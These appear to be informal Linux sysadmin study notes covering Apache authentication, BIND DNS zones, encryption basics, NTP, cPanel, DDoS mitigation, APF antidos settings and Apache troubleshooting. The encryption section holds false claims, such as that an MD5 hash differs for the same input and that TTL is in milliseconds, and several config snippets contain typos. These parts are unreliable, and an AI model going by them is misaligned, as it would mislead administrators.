.htaccess AuthName “restricted stuff” AuthType Basic AuthUserFile /etc/httpd/conf/.htpasswd-www2 Require user andy :wq! # cd /etc/httpd/conf # htpasswd –mc .htpasswd-www2 andy # chgrp apache .htpasswd-www2 # chmod 640.htpasswd-www2 # service httpd restart ( httpd –t syntax check of configuration) (service ntpd config test) * after go to the main conf file # vi /etc/httpd/conf/httpd.conf An go to the end of file AllowOverride Authconfig add this line above </Directory> type # service httpd restart * client side step # httpd ://www2.example.com Then ask u for login Username : andy Passwd : andy ( for GUI mozilla http://station.example.com/index.html http://localhost/index.html) # Vi .htaccess Line no 1) authentication name that will appear on client side 2) authentication line is basic i.e it’s going for username & passwd 3) that is the password fiel 4) person or user who can access password i.e password andy is stored in this file # htpasswd –mc htpasswd-www2 andy Give hyper text type password to the user andy and stored it in respective file. --mc :-- md5 passwd -C :-- create a file Change group file for apache Change the permission of file. * i.e. add authentication for the website DNS SERVER 2nd November 07 DNS –Domain Name System Server Features :- 1) forward lookup - converts hostname to IP address 2) reverse lookup – converts IP address to hostname 3) MX records - mail exchanger Mail exchanger records kept inside the DNS 4)Domain Hierarchy -- tree like structure of domain . Domain hierarchy .com .net .gov o.org Top level domain yahoo hotmail server1.example Sub domain hosts /mlc’s www mail S-1 S-2 S-3 S-4 S-5 S-6 * every top level domain has a different DNS server :. * Zone :- zone is a set of record of every machine in domain SYSTEM V SERVICES : PORT NO.: 53 * two different type of DNS * the two main type of DNS are 1] MASTER DNS : - master DNS consist of main copy of zone deta 2] SLAVE DNS :- replicated copy of Master DNS * Advantages of Master & Slave DNS 1] fault tolerance :- if master DNS server is down then we can make use of slave DNS. 2] Load Balancing:- management of client by both. Master & Slave . * LAB Sequence :- * How to configure master DNS 3 files which are to be configure # /var/named/chroot/etc/named.conf # forword lookup zone # reverse lookup zone # cd /var/named/chroot/etc/ # vi named.conf Options { directory “/var/named”; }; zone “ost.com” IN { type master; file “ost.com.zone”; }; zone “0.168.192. in-addr.arpa” IN { type master; file “192.168.0.zone”; }; :wq! Explanation :-- Line -- 1) option for the zone { start of options 2) directory from which the zones are to be taken 3) End of option 4) start of forward lookup zone for ost.com IN – internet { start of zone 5) type master – type of DNS is master DNS 6) name of forward lookup zone 7) }; end of forward lookup zone 8) this is revers lookup zone for ost.com in-addr.arpa --> syntax of DNS IN- internet { start of reverse lookup zone 9) type of DNS is master DNS 10) name of reverse lookup zone 11) }; end of reverse lookup zone :wq! # cd /var/named/shroot/var/named/ * for forward lookup zone # vi ost.com.zone $TTL 86400 ost.com IN SOA station1.ost.com. root.station1.ost.com. ( 42 ; Serial 3H ; Refresh 15M ; Retry 1W ; Expiry 1D ) ; Negative answer cache IN NS station1.ost.com. Station1 IN A 192.168..0.1 Station2 IN A 192.168.0.2 Station3 IN A 192.168.0.3 Station4 IN A 192.168.0.4 Station5 IN A 192.168.0.5 Station6 IN A 192.168.0.6 @ IN MX 10 server1 @ IN MX 19 station1 www1 IN CNAME station1 www2 IN CNAME station2 www3 IN CNAME station3 www4 IN CNAME station4 www5 IN CNAME station5 www6 IN CNAME station6 www254 IN CNAME server1 Explanation :-- 1) $ TTL :-- time to live --> time to live cache Memory--> the client will stored the Answer got from DNS server for ( 86400) This mili second 2) ost.com --> name of the zone IN --> internet SOA --> start of authority Station1.ost.com --> host name of DNS Root.station1.ost.com--> Administrator of DNS server is root user ( --> start of option 3) 42 --> serial version number means -- IF any change i.e addition of removal of Machine the next version is 2 be given. 4) 3H ; Refresh ; --> the slave DNS then it will replicated deta from master DNS Every 3 hourse. 5) 15m; retry --> the slave DNS is enable to contact master DNS then it will Keeping after every 15 min . 6) 1W; Expire --> means if slave server is not able to contact the master for 1 week then it is no use 7) 1D ) --> if client has not got the answer from master of DNS server for a particular host machine then it will not contact DNS for 1 day for that host. 8) IN – internet NS --> name server is station 2.ost.com 11) address of station1 is 192.168.0.1 12) 2 0.2 13) 3 0.3 14) 4 0.4 15) 5 0.5 16) 6 0.6 17) Server1 server1 0.254 18) @ -- ost.com MX—mail exchanger 10 – priority of mail exchange 19) As above 19 -- priority 21) www1 CNAME --> CANONICAL NAME for www1 is station1 22)as above 23) 24) 25) 26) 27) www254 is server canonical name # vi 192.168.0.zone $TTL 86400 @ IN SOA station1.ost.com root@station1.ost.com ( ( 42 ; Serial 3H ; Refresh 15M ; Retry 1W ; Expiry 1 D ) ; minimum IN NS statin1.ost.com 1.0.168.192.in-addr.arpa IN PTR statoon1.ost.com. 2.0.168.192.in-addr.arpa IN PTR statoon2.ost.com. 3.0.168.192.in-addr.arpa IN PTR statoon3.ost.com. 4.0.168.192.in-addr.arpa IN PTR statoon4.ost.com. 5.0.168.192.in-addr.arpa IN PTR statoon5.ost.com 6.0.168.192.in-addr.arpa IN PTR statoon6.ost.com.. Line 9 --> reveres lookup add for station 1 in-addr.arpa --> syntax of DNS PTR – pointer Station1.ost.com -- HOSTNAME Same Explanation Of Above Line (DNS .stuff.com) # vi /etc/resolve.conf Make entry as Search ost.com Nameserver 192.168.0.1 :wq! # service named restart # cd # host station2.example.ost.com It gives u IP address # host 192.168.0.6 Hostname gives you # host yahoo.com That gives you IP address 5th nov 2007 DATA ENCRYPTION Data encryption cipher algorithm text | encrypted data * data encrypted :-- to convert given deta into a coded or encrypted far it call as data encryption * 5 types of data encryptions:-- 1) random Number algorithm 2) one way hash 3) symmetric key encryption 4) asymmetric key encryption 5) digital certificate . 1) random Number algorithm :- this is a older method of encryption in this for same plain text we will get different cipher text # openssl --rand bae64 23 Explanation:- -rand :- random number algorithm Base 64:- 64 bit key The num _23 :- any plain text 2) one way hash :-- one way hash can encrypted the data but cannot dcrypt it for same plain text it give u different cipher text . # openssl md5 Any name | Then press ctrl +d twice<--| 3) symmetric key encryption :-- Sender internet receiver Key keys Steps: 1) sender will create key for encryptions 2) sender will send the key to receiver 3) sender will encrypt the data with the key and send it’s to receiver 4) receiver will dcrypt the data with the help of same key * disadvantage :- if any one haks the key then he can lock the data * Advantages :-- this method is faster the a symmetric key encryption. 4) Asymmetric key encryption :-- There are <type of keys> 1) public key 2) private key sender-------- internet--------reciever | | | | public private public private key key key key steps:- 1) sender will create key pair 1) public key 2) private key 2) sender will publish the public key on the internet but will protect his private key 3) receiver does the same thing sender will encrypted the data 4) with public key of receiver 5) receiver will dcrypt data with his own private key * Advantages :-- no one can hack the data ( diff key) * Disadvantage :-- there is no trust sender and receiver DIGITAL CERTIFICATE :-- Certificate authority Pv.k----pu.k----- CA pu pr | | | | Sender-----------internet------------receiver Steps :-- 1) sender will create will private key 2) sender will get register with the CA by filling of registration form 3) CA will issuing digital certificate containing with public key 4) Receiver will perform same steps 5) Other steps are previous asymmetric key encryption Advantages :-- trust between sender & receiver * digital certificate for IMAP server system V services # service dovecote restart # cd /etc/pki/dovecot/certs/ # ls Dovecot.pem ( remove this file) # cd /etc/pki/tls/certs ( SSL—secured socket layer ) # make /etc/pki/dovecot/certs/dovecot.pem Then output Country Name : IN State : MAH Organization name : OST Organization unit name : training Common name : station6.example.com E-mail address : just enter # cd /etc/pki/dovecot/certs/ # ls # cp dovecot.pem ../private/ # service dovecot restart # mutt –f {bob@station6.example.com/ssl} Press O NTP SERVER * network time protocol server :-- ( this is synchronize) * server side step * # vi /etc/ntp.conf :wq! # service ntpd restart # ntpdate -buv 192.168.0.254 Syncronise clock of client machine with the clock of server machine. * parmanant bases # vi /etc/ntp.conf Go to the line no 30. Server 192.168.0.254 --add this line # service ntpd restart # ntpq - check it Ntpq> peers Quit # clear ( wall 192.168.0.X reboot) Exam over view I) troubleshooting & maintenance 2 ½ hours 100 marks Questions 10 Each question having 10 marks 5 are compulsory -- 1 hrs 5+2 --RHCT | 5+3 -- RHCE | 1 ½ hours II) installation & configuration 3 hours 100 marks Questions --25 RHCT --12 Q RHCT – 70% | I 70% | II RHCE -- 80% | I 70% | II * how to add extra IP address # cd /etc/sysconfig/network-scripts/ # cp ifcfg-eth0 ifcfg-eth:4 # vi ifcfg –eth:4 # service network restart Dial up modem # wvdial conf /etc/wvdial.conf # vi /etc/wvdial.conf * Brod band modem # adsl - setup # adsl - start # adsl - stop # linux rescue noipv6 ask-method nfs grub boot loader corrupt Add IP range from command line : #cd /etc/sysconfig/network-scripts #vi ifcfg-eth0-range0 IPADDR_START=67.159.6.98 IPADDR_END=67.159.6.126 NETMASK=255.255.255.224 CLONENUM_START=0 You will have to remove the add-on domain from all the files cPanel creates an entry in and then add it back. The files are httpd.conf (restart the httpd service once you edit it) named.conf and .db file from /var/named/ (restart named service) /etc/localdomains /etc/remotedomains /etc/trueuserdomains /etc/userdomains /var/cpanel/users/username (username is the main domains username) all soution URL http://instacarma.com/blog/tag/1. what is ddos attack and how to prevent? A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of the concerted efforts of person or persons to prevent an Internet site or service from functioning efficiently or at all, temporarily or indefinitely. Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers. The term is generally used with regards to computer networks, but is not limited to this field; for example, it is also used in reference to CPU resource management.[1] One common method of attack involves saturating the target machine with external communications requests, such that it cannot respond to legitimate traffic, or responds so slowly as to be rendered effectively unavailable. In general terms, DoS attacks are implemented by either forcing the targeted computer(s) to reset, or consuming its resources so that it can no longer provide its intended service or obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately. Denial-of-service attacks are considered violations of the IAB's Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers. They also commonly constitute violations of the laws of individual nations.[citation needed] Prevention and response [edit]Firewalls Firewalls have simple rules such as to allow or deny protocols, ports or IP addresses. Some DoS attacks are too complex for today's firewalls, e.g. if there is an attack on port 80 (web service), firewalls cannot prevent that attack because they cannot distinguish good traffic from DoS attack traffic. Additionally, firewalls are too deep in the network hierarchy. Routers may be affected even before the firewall gets the traffic. Nonetheless, firewalls can effectively prevent users from launching simple flooding type attacks from machines behind the firewall. Some stateful firewalls, like OpenBSD's pf(4) packet filter, can act as a proxy for connections: the handshake is validated (with the client) instead of simply forwarding the packet to the destination. It is available for other BSDs as well. In that context, it is called "synproxy".[41] [edit]Switches Most switches have some rate-limiting and ACL capability. Some switches provide automatic and/or system-wide rate limiting, traffic shaping, delayed binding (TCP splicing), deep packet inspectionand Bogon filtering (bogus IP filtering) to detect and remediate denial of service attacks through automatic rate filtering and WAN Link failover and balancing.[citation needed] These schemes will work as long as the DoS attacks are something that can be prevented by using them. For example SYN flood can be prevented using delayed binding or TCP splicing. Similarly content based DoS can be prevented using deep packet inspection. Attacks originating from dark addresses or going to dark addresses can be prevented using Bogon filtering. Automatic rate filtering can work as long as you have set rate-thresholds correctly and granularly. Wan-link failover will work as long as both links have DoS/DDoS prevention mechanism.[citation needed] [edit]Routers Similar to switches, routers have some rate-limiting and ACL capability. They, too, are manually set. Most routers can be easily overwhelmed under DoS attack. If you add rules to take flow statistics out of the router during the DoS attacks, they further slow down and complicate the matter. Cisco IOS has features that prevent flooding, i.e. example settings.[42] [edit]Application front end hardware Application front end hardware is intelligent hardware placed on the network before traffic reaches the servers. It can be used on networks in conjunction with routers and switches. Application front end hardware analyzes data packets as they enter the system, and then identifies them as priority, regular, or dangerous. There are more than 25 bandwidth management vendors. Hardware acceleration is key to bandwidth management.[citation needed] [edit]IPS based prevention Intrusion-prevention systems (IPS) are effective if the attacks have signatures associated with them. However, the trend among the attacks is to have legitimate content but bad intent. Intrusion-prevention systems which work on content recognition cannot block behavior-based DoS attacks.[citation needed] An ASIC based IPS can detect and block denial of service attacks because they have the processing power and the granularity to analyze the attacks and act like a circuit breaker in an automated way.[citation needed] A rate-based IPS (RBIPS) must analyze traffic granularly and continuously monitor the traffic pattern and determine if there is traffic anomaly. It must let the legitimate traffic flow while blocking the DoS attack traffic.[citation needed] [edit]Prevention via proactive testing Test platforms such as Mu Dynamics' Service Analyzer are available to perform simulated denial-of-service attacks that can be used to evaluate defensive mechanisms such IPS, RBIPS, as well as the popular denial-of-service mitigation products from Arbor Networks. An example of proactive testing of denial-of-service throttling capabilities in a switch was performed in 2008: The Juniper EX 4200switch with integrated denial-of-service throttling was tested by Network Test and the resulting review was published in Network World. [edit]Blackholing and sinkholing With blackholing, all the traffic to the attacked DNS or IP address is sent to a "black hole" (null interface, non-existent server, ...). To be more efficient and avoid affecting your network connectivity, it can be managed by the ISP.[43] Sinkholing routes to a valid IP address which analyzes traffic and rejects bad ones. Sinkholing is not efficient for most severe attacks. [edit]Clean pipes All traffic is passed through a "cleaning center" via a proxy, which separates "bad" traffic (DDoS and also other common internet attacks) and only sends good traffic beyond to the server. The provider needs central connectivity to the Internet to manage this kind of service.[44] Prolexic, Verisign and Adversor are examples of providers of this service.[45][46] [edit] 2. What is file system? A file system (sometimes written as filesystem) is a method of storing and organizing arbitrary collections of data, in a form that is human-readable. A file system organizes data into an easy-to-manipulate database of human-readable names for the data, usually with a human-readable hierarchical organization of the data, for the storage, organization, manipulation, and retrieval by the computer's operating system. Each discrete collection of data in a file system is referred to as a computer file. 3. What is IP spoofing? he Basic protocol for sending data over the Internet network and many other computer networks is the Internet Protocol ("IP"). The header of each IP packet contains, among other things, the numerical source and destination address of the packet. The source address is normally the address that the packet was sent from. By forging the header so it contains a different address, an attacker can make it appear that the packet was sent by a different machine. The machine that receives spoofed packets will send a response back to the forged source address, which means that this technique is mainly used when the attacker does not care about the response or the attacker has some way of guessing the response. In certain cases, it might be possible for the attacker to see or redirect the response to his own machine. The most usual case is when the attacker is spoofing an address on the same LAN or WAN. Hence the attackers have unauthorized access to computers. 4. Port Numbers. 21 => FTP 22 => SSH 23 => Telnet 25 => SMTP Mail Transfer 43 => WHOIS service 53 => name server (DNS) 80 => HTTP (Web server) 110 => POP protocol (for email) 995 => POP over SSL/TLS 9999 => Urchin 111 => rpcbind 953 => rndc 143 => IMAP Protocol (for email) 993 => IMAP Secure 443 => HTTP Secure (SSL for https:// ) 3306 = > MysQL Server 4643 => Virtuosso Power Panel 2082 => CPANEL 2083 => CPANEL - Secure/SSL 2086 => CPANEL WHM 2087 => CPANEL WHM - Secure/SSL 2095 => cpanel webmail 2096 => cpanel webmail - secure/SSL Plesk Control Panel => 8443 DirectAdmin Control Panel => 2222 Webmin Control Panel => 10000 1. How to find which ports are open? You can find the ports in your linux server with the nmap command netstat -nap --tcp 5. How to work FTP and what is use of port 20 and 21? Basically FTP is a protocol that uses two ports namely port 21 for commands and port 20 for data. In Active FTP, the client initiates a connection on the server’s command port. The server then initiates a connection with the client from its data port. In Passive FTP, the client initiates both connections with the server, which remains “passive”. 6. What is kernerl? The kernel is the essential center of a computer operating system, the core that provides basic services for all other parts of the operating system. A synonym is nucleus. A kernel can be contrasted with a shell, the outermost part of an operating system that interacts with user commands. Kernel and shell are terms used more frequently in Unix operating systems than in IBM mainframe or Microsoft Windows systems. Typically, a kernel (or any comparable center of an operating system) includes an interrupt handler that handles all requests or completed I/O operations that compete for the kernel's services, a scheduler that determines which programs share the kernel's processing time in what order, and a supervisor that actually gives use LEARN MORE * Open source Web and application servers of the computer to each process when it is scheduled. A kernel may also include a manager of the operating system's address spaces in memory or storage, sharing these among all components and other users of the kernel's services. A kernel's services are requested by other parts of the operating system or by application programs through a specified set of program interfaces sometimes known as system calls. Because the code that makes up the kernel is needed continuously, it is usually loaded into computer storage in an area that is protected so that it will not be overlaid with other less frequently used parts of the operating system. The kernel is not to be confused with the Basic Input/Output System (BIOS). Some kernels have been developed independently for use in any operating system that wants to use it. A well-known example is the Mach kernel, developed at Carnegie-Mellon University, and currently used in a version of the Linux operating system for Apple's PowerMac computers. 7. How many tables in iptables? NAT Mangle Filter 8. What are shell variables? Anti-DoS configuration for APF Firewall - helps mitigate denial of service type attacks. 1) Introduction: Antidos is a log parsing script made for r-fx.org's APF (advanced policy firewall). It's purpose is too parse specific log formats for network attacks against a given system; then take certian actions. it is designed to be modular so it can be removed from APF and used in other environments. The two supported log formats are standard iptable log entries (as seen in a systems kernel log), and snort portscan.log format. 2) Configuration: The configuration file for antidos is well commented and easy to configure & navigate. Antidos main configuration file is located at: /etc/apf/ad/conf.antidos You will need to go through it and configure options you feel meet your environment settings. Below is a definition breakdown of each feature in the conf.apf file (except misc. options), listed in the format of Option (config option and default value) followed by definition. Option: APF_BASE="/etc/apf" Definition: The base install path of APF, should not need to be changed on default installations. Option: APF_CNF="$APF_BASE/conf.apf" Definition: The absolute location of the APF config file, should not need to be changed on default installations. Option: INSPATH="$APF_BASE/ad" Definition: The base install path of antidos, should not need to be changed on default installations. Option: ANTILOG="/var/log/apfados_log" Definition: This is absolute file path that antidos should log events to. It's creation and permissions are set by antidos however logrotate.d or the likes can be used to handle rotation of this file. Option: LP_KLOG="0" Definition: Enable parsing of the kernel log file for attack events, if this or another LP_* (log parsing) option is not enabled then antidos will not operate. [0 = Disabled / 1 = Enabled] Option: LP_SNORT="0" Definition: Enable parsing of the snort portscan.log file for attack events, if this or another LP_* (log parsing) option is not enabled then antidos will not operate. [0 = Disabled / 1 = Enabled] Option: DET_SF="0" Definition: Detect SYN_RECV connections from the netstat output; this is primarily intended to stop syn-flood attacks against web servers. [0 = Disabled / 1 = Enabled] Option: KLOG="/var/log/messages Definition: The path to the system's kernel log file, iptables logs by default to the systems kernel log. Option: SLOG="/var/log/snort/portscan.log" Definition: The path to your snort installation's portscan.log file. Option: LN="100" Definition: The amount of lines that should be checked at the end of a given log file. The higher this value; the slower antidos will run, 100-300 is offten a safe bet. Option: TRIG="12" Definition: This value is the trigger value, if a remote IP is found present in the given log file more than this amount; an attack is assumed to be in progress. Setting this to low may result in a high false positive ratio, but to high of a value may miss attacks all together. A 10-20% value in relation to the LN option is a good bet. Option: SF_TRIG="25" Definition: This value is the trigger value for syn-flood bans. If a remote IP is found present more than this amount of times with a SYN_RECV connection; an attack is assumed to be in progress. This value is naturally lower than standard TRIG, and the LN option does not apply to this tigger. A value of 25 is often ideal for this option but should be increased/decreased based on load. Option: ROUTE_REJ="0" Definition: This option controles if attacking hosts should be rejected from the systems route table. This is not a recommended feature but is nonetheless common method. [0 = Disabled / 1 = Enabled] Option: DROP_IF="0" Definition: This option controles if the DESTINATION IP of an attack should be droped on your system. In other words unbinding the victim ip from your system, this is wise on networks with zero tolerence for attacks. The main adapter ip address is obviously excempted from this feature. [0 = Disabled / 1 = Enabled] Option: NCRIT_PORTS="$INSPATH/noncrit.ports" Definition: Non-critical ports file; ports (destination port) defined in this file will not trigger DROP_IF function (if set to 1). Remote hosts will still be banned as applicable to other options (ROUTE_REJ etc..). Effective for ignoring common scanned ports that pose no threat (e.g: netbios). This file has a line seperated format. Option: IPT_BL="1" Definition: This options controles standard iptables block of an attack and should be enabled. [0 = Disabled / 1 = Enabled] Option: FWRST="$APF_BASE/apf -r" Definition: The command method of restart/reloading firewall rules after an attack ban is generated. Option: BLOCKR="$INSPATH/ad.rules" Definition: The location to write out iptables based blocks of an attack, this file should be included during loadtime of your given iptables firewall(already the case with APF). Option: ARTOPIC="Urgent: Administrative issue enclosed, please read." Definition: The subject string for e-mail alerts sent by antidos. Option: MAX_MNUM="12" Definition: This value is used to prevent email flooding from antidos. No more than this value of e-mail alerts will be sent out per/day. Logging events will still be made. Option: CONAME="Your Company" Definition: The name of your company/Organization as will be displayed in arin abuse notices. Option: USR_ALERT="0" Definition: This value controles the sending of e-mail alerts to a defined user. This and/or another *_ALERT setting should be enabled for some form of notifcation of attacks. The e-mail contents of this alert can be configured from the usr.msg file inside your antidos path. [0 = Disabled / 1 = Enabled] Option: USR="you@yourco.com" Definition: The user e-mail address that antidos sends attack alerts to. Option: ARIN_ALERT="0" Definition: This value controles the sending of e-mail alerts to the listed arin contact info for an attacking IP (if present). This and/or another *_ALERT setting should be enabled for some form of notifcation of attacks. The e-mail contents of this alert can be configured from the arin.msg file inside your antidos path. [0 = Disabled / 1 = Enabled] Option: IPW_SRV="whois.arin.net" Definition: This value controles the server used to query an ip for a contact e-mail address. If needed this should be changed to a prefered ip-whois server. Option: RETUSR="$USR" Definition: This value controles the return e-mail address as listed in the arin e-mail alert sent to remote network admins. By default this value will be taken from the USR option above. 3) Usage: Antidos is intended to operate via cron. This is a critical setup point as if not done, antidos will simply not operate. The following string can be placed into /etc/crontab or similar file: */2 * * * * root /etc/apf/ad/antidos -a >> /dev/null 2>&1 This will run antidos every two minutes. I dont recommend running it once a minute as it may cause a bottleneck for itself and the CPU. Likewise running it beyound a period of once every 5 minutes is not recommended either, for obviouse reasons. MOD-DEFLATE : mod-deflate Client asks like this : What is the process for configuring the server to transmit my webpages with gzip compression This Google code page recommends using gzip to compress webpages sent from the server. http://code.google.com/speed/page-speed/docs/payload.html#GzipCompression What does it mean by this quotation: 'To enable compression, configure your web server to set the Content-Encoding header to gzip format for all compressible resources' -------------- OR Google have stated recently that it will take into account the speed at which a website loads in determining the heirarchy on the search engine results page. http://code.google.com/speed/community.html Google recommends compressing the website prior to transmission from the server to the client via gzip compression. This has become an option recently as more of the old browsers which did not accept gzip compression become redundant in use. My impression from searching the web and trying to interpret geekspeek is that the server can be configured to compress the website prior to transmission. It is then uncompressed by the browser with a saving of the time to resolution of the page being about 50% The server I use is an Apache 2.0.63. There is an instruction for inserting script into the .htaccess file to configure the server to compress using the deflate command contained in a blog: To gzip your content in Apache, you can add this to your httpd.conf or .htaccess file: SetOutputFilter DEFLATE There are other bits of code that others use to configure the server and use the gzip code. ----------------------OR Since I would like to improve the loading time of my websites, I wish to enable compressions. But I noticed that mod_deflate and/or mod_gzip are not currently installed with Apache on the server where my websites are hosted. Would that be possible to install one of those Apache modules ? Thank you. ------------------------OR What I would like to do is to enable http gzip compression, so that when I access http://www.cnx-translation.com, it will compress index.htm on the fly, and instead of downloading a 64KB files, the browser would download a file between 10 to 15 KB. I have edited my .htaccess to enable that behavior and added the line # compress all text & html: AddOutputFilterByType DEFLATE text/html text/plain text/xml as instructed here: http://betterexplained.com/articles/how-to-optimize-your-site-with-gzip-compression/ Then I tested http://www.cnx-translation.com with http://www.gidnetwork.com/tools/gzip-test.php to check if gzip was enabled but it did no seem to be successful. Then i used php_info() to check if mod_deflate or mod_gzip were enabled in apache, but apparently they are not loaded. --------------------------------OR search : check in phpinfo, search deflate, It should be in the section "Loaded Modules", otherwise may be it is not compiled on the server. reply : We don't have module deflate compiled on the server. We can move your hosting account to different server where mod_deflate is compiled. Let us know if you wish to move your hosting account to different server. --------------------------- How to enable mod_deflate : http://www.mydigitallife.info/2010/04/17/how-to-enable-mod_deflate-gzip-compression-on-cpanel-web-hosts/Also please read : http://forum.ahosting.net/php-compiled-apache-cgi-suphp-fastcgi-advantages-disadvantages-394.html http://mt5.radified.com/blog/2010/01/suphp-apache-web-server-modx-777-security.html http://forums.cpanel.net/f185/folder-permission-755-file-permission-644-safe-124369.html PHP compiled as Apache/CGI/suphp/FastCGI :: Advantages/Disadvantages PHP compiled as Apache/CGI/suphp/FastCGI :: Advantages/Disadvantages Apache Module (mod_php) ======================== Advantages: 1. speed 2. needs less memory (RAM) than CGI 3. php.ini values can be changed via PHP scripts, vhost files, .htaccess files Disadvantages: 1. Scripts are being executed with Apache privileges, which might lead to some security related problems 2. Only one version of PHP can be installed as Apache module 3. It is not possible to have seperate php.ini files for every host suPHP ============ PHP will be installed as binary and is included into Apache through suPHP Advantages: 1. Scripts will be executed with user privileges. 2. Each vhost can have its own php.ini file 3. Needs less memory (RAM) than CGI 4. More than one PHP version can be run as suPHP 5. There is no need to uninstall PHP as Apache module (mod_php) Disadvantages: 1. php.ini values cannot be changed via PHP scripts, vhost files, .htaccess files 2. suPHP might be a little slower than mod_php CGI ============ The PHP source will be patched and installed as binary. Advantages: 1. Scripts will be executed with user privileges. 2. More than one PHP version can be run as CGI 3. Compatible with Apache module mod_vhost_alias (mass hosting module) due to our security patch 4. The patch modifies PHP's open_basedir automatically Disadvantages: 1. CGI might use a little more memory (RAM). Therefore, it's not recommended to run PHP as CGI on slow virtual servers (vServer) 2. php.ini values cannot be changed via PHP scripts, vhost files, .htaccess files FastCGI ============ PHP will be loaded as FastCGI module into Apache webserver. Advantages: 1. Scripts will be executed with user privileges. 2. More than one PHP version can be run as FastCGI 3. Might be better in speed compared to CGI and suPHP Disadvantages: 1. php.ini values cannot be changed via PHP scripts, vhost files, .htaccess files 2. complicated installation/configuration ========================================================================= Folder Permission 755 and File Permission 644 safe ? I would like to request an assistant. My server is configured to use SuPHP and PHP run as CGI. May i know it is safe to have a folder permission 755 and file permission 644 ? The reason i'm asking is that, i found out eventhough the folder permission is 755 and file permission 644, my joomla application seems able to write the uploaded file into the folder or alter a file that have 644 permission. I'm thinking whether hackers also able to upload into that folder and alter the files from outside ? Ans : " May i know it is safe to have a folder permission 755 and file permission 644 ? " , Yes these permissions are safe under Suphp. The following are the advantages of Suphp ( it should run as cgi ) * PHP runs as your user/group * PHP files can have permissions of 640 (hiding things like passwords from other accounts) * Files/folders written by PHP are written as user/group (no Apache or other global user) * Custom php.ini file per site (can add/remove security options) Please note that suPHP does not allow permissions 666 and 777. The new writable permissions are Files: 644 Folders: 755 Also suphp will not allow to declare php variable through .htaccess. You can use php.ini file to declare php variables ***********************************************************************************************Apache not starting Apache logs showing error similar to the one shown below [Fri Dec 18 10:28:46 2009] [error] (21)Is a directory: could not open transfer log file /usr/local/apache/domlogs/txsp.net. Unable to open logs [Fri Dec 18 10:28:46 2009] [error] (21)Is a directory: could not open transfer log file /usr/local/apache/domlogs/txsp.net. Unable to open logs [Fri Dec 18 10:28:46 2009] [error] (21)Is a directory: could not open transfer log file /usr/local/apache/domlogs/txsp.net. Unable to open logs [Fri Dec 18 10:28:47 2009] [error] (21)Is a directory: could not open transfer log file /usr/local/apache/domlogs/txsp.net. Unable to open logs [Fri Dec 18 10:28:47 2009] [error] (21)Is a directory: could not open transfer log file /usr/local/apache/domlogs/txsp.net. Unable to open logs This can happen if domain name and cPanel user name is same Do the following command grep DOMAINNAME /etc/userdomains ex, root@host [/usr/local/apache/domlogs]# grep txsp.net /etc/userdomains txsp.net: txsp.net root@host [/usr/local/apache/domlogs]# If it shows domain name and username is one and the same, modify username from WHM -> modify accounts and make sure that changes username in domlogs. Apache httpd is the Apache HyperText Transfer Protocol (HTTP) server program Q 1. How to check apache server path Whereis httpd Q 2. Ways to restart httpd /usr/sbin/httpd -k start /etc/init.d/httpd restart service httpd restart Q 3. How to check apache version httpd –v httpd –v Server version: Apache/2.2.13 (Unix) Server built: Sep 23 2009 05:43:01 Cpanel::Easy::Apache v3.2.0 rev4791 Httpd –V It will show the httpd version along with build parameters of httpd Httpd –V root@explore [~]# httpd -V Server version: Apache/2.2.13 (Unix) Server built: Sep 23 2009 05:43:01 Cpanel::Easy::Apache v3.2.0 rev4791 Server's Module Magic Number: 20051115:23 Server loaded: APR 1.3.8, APR-Util 1.3.9 Compiled using: APR 1.3.8, APR-Util 1.3.9 Architecture: 32-bit Server MPM: Prefork threaded: no forked: yes (variable process count) Server compiled with.... -D APACHE_MPM_DIR="server/mpm/prefork" -D APR_HAS_SENDFILE -D APR_HAS_MMAP -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled) -D APR_USE_SYSVSEM_SERIALIZE -D APR_USE_PTHREAD_SERIALIZE -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT -D APR_HAS_OTHER_CHILD -D AP_HAVE_RELIABLE_PIPED_LOGS -D DYNAMIC_MODULE_LIMIT=128 -D HTTPD_ROOT="/usr/local/apache" -D SUEXEC_BIN="/usr/local/apache/bin/suexec" -D DEFAULT_PIDLOG="logs/httpd.pid" -D DEFAULT_SCOREBOARD="logs/apache_runtime_status" -D DEFAULT_LOCKFILE="logs/accept.lock" -D DEFAULT_ERRORLOG="logs/error_log" -D AP_TYPES_CONFIG_FILE="conf/mime.types" -D SERVER_CONFIG_FILE="conf/httpd.conf" Q 4. How to check modules compiled with apache httpd –l httpd –M httpd –l only shows the list of modules but httpd –M shows static and shared modules Q 5. How to check apache log paths and how to view the logs Error Log : record any errors that it encounters in processing requests Access log : all requests processed by the server 1. Httpd –V 2. Open httpc.conf file and search for “ErrorLog” directive. Open httpd.conf file and search “ CustomLog” directive To check the logs : tail –f error log file path Q 6. . How to find out config file paths and how to check syntax of conf file. Redhat and CentOS stores httpd conf file at : /etc/httpd/conf/httpd.conf Apache is, by default, installed in /etc/httpd directory. But this path also depends on how apache has been compiled. Default configuration file name httpd.conf. 1. Using find command: # find / -name 'httpd.conf' -print 2. Using locate command: locate httpd.conf To check syntax of httpd.conf file After making any changes in httpd.conf file run following commands to check the syntax : httpd –t Service httpd configtest Q 7 How to check process running – apache process lsof -i :80 (List open file system) Option –i : This option selects the listing of files any of whose Internet address matches the address specified. Output : COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME httpd 10978 root 5u IPv4 34261427 TCP *:http (LISTEN) httpd 11000 root 5u IPv4 34261427 TCP *:http (LISTEN) httpd 11010 nobody 5u IPv4 34261427 TCP *:http (LISTEN) Command: Command or a process involved Pid: process ID User: A user running the command FD: The file descriptor Type: type of connection Device: Device number Node: TCP/UDP nodes Name: Ports that are awaiting connections have the keyword LISTEN appended to them. netstat -an | grep :80 | sort Show only active Internet connections to the server at port 80 and sort the results. Useful in detecting single flood by allowing users to recognize many connections coming from one IP. watch -n 1 netstat -ta Q 8. Apache failed – different error and there solutions 1. Error : Unable to open file Check for the log file path and cd to it. Check the log file size Echo > error_log Echo > access_log Service httpd restart 2. Error : httpd not started bad user name Copy the user name Open httpd.conf file Search the virtualhost entry for the user name Remove the virtualhost entry from the conf file Save and exit Check the configuration of conf file Restart httpd 3. Error : Address already in use: make_sock: could not bind to address 0.0.0.0:443 no listening sockets 